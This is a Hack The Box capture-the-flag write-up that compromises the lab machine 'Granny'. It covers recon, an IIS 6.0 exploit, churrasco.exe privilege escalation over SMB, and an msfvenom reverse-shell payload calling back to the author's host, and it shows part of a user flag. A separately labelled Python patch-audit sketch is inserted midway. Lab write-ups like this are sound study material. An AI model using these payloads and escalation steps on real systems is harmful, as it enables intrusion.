HTB: Granny Write-up
Target Machine Information:
· Hostname : GRANNY
· IP Address : 10.10.10.15
· OS : Windows
sudo bash nmapAutomator.sh 10.10.10.15 Vulns Recon
We get a lot of information from our scan but the main thing we are looking at is the server version.
From our Grandpa box we know that there is a Metasploit module for Microsoft IIS httpd 6.0 that works. But it does not work here. So I did some more research on the vulnerability and found some other versions of the exploit on GitHub.
This one had the simplest usage, so let's go ahead and try it.
And we get a shell! But we cannot even grab a user flag… Time to ESCALATE!
- I copied and pasted the output of systeminfo to a .txt file
- Moved it to my Windows Exploit Suggester directory and ran the command
python windows-exploit-suggester.py -d 2021-05-12-mssb.xls -i systeminfo.txt
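The same systeminfo.txt is also what an administrator would audit for patch level. The sketch below is an added example, not code from this write-up or from windows-exploit-suggester: it parses systeminfo output and lists which KBs from a baseline are not installed. The sample output, the KB numbers and the required_kbs list are constructed placeholders.

```python
import re

# Constructed sample of English-locale `systeminfo` output; the host name and
# KB numbers are placeholders, not values from the box in this write-up.
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002 - Update
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Network Adapter
"""

FIELD_RE = re.compile(r"^([^:\s][^:]*):\s*(.*)$")            # "Key:   value"
ENTRY_RE = re.compile(r"^\s+\[\d+\]:\s*((?:KB|Q)\d+)", re.I)  # "  [01]: KB123"


def parse_systeminfo(text):
    """Return (fields, hotfixes): top-level fields and installed hotfix IDs."""
    fields, hotfixes, current = {}, [], None
    for line in text.splitlines():
        field = FIELD_RE.match(line)
        if field:
            current = field.group(1).strip()
            fields[current] = field.group(2).strip()
            continue
        entry = ENTRY_RE.match(line)
        # Only count numbered entries that sit under the Hotfix(s) field.
        if entry and current == "Hotfix(s)":
            hotfixes.append(entry.group(1).upper())
    return fields, hotfixes


def patch_summary(text, required_kbs):
    """Compare installed hotfixes with a baseline list (hypothetical input)."""
    fields, hotfixes = parse_systeminfo(text)
    return {
        "os": fields.get("OS Name", "unknown"),
        "version": fields.get("OS Version", "unknown"),
        "installed": hotfixes,
        "missing": [kb for kb in required_kbs if kb.upper() not in hotfixes],
    }


if __name__ == "__main__":
    print(patch_summary(SAMPLE_SYSTEMINFO, ["KB0000002", "KB0000003"]))
```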
After trying to run some of these exploits I found that the machine was likely vulnerable to churrasco.exe.
Before getting the exploit I make a Temp directory in my shell so I can download my executable there.
Make a dir called “share” and move churrasco.exe to it. Then move back one directory and launch the following command on your attack machine.
And this one on your victim.
Now that we have it, let's run it.
And we see that we are root, but we need to get a better shell.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=555 -f exe | tee msf2.exe
With our smbserver still running we then download our reverse shell.
Something strange was happening with my usual netcat “-lvnp” so I had to modify it slightly to “lnvp”.
Keep in mind the shell might be very unstable, so be patient when getting the flags.
C:\Documents and Settings\Lakis\Desktop>type user.txt
700c5dc1...
C:\Documents and Settings\Administrator\Desktop>type root.txt
Other than that…That’s all folks.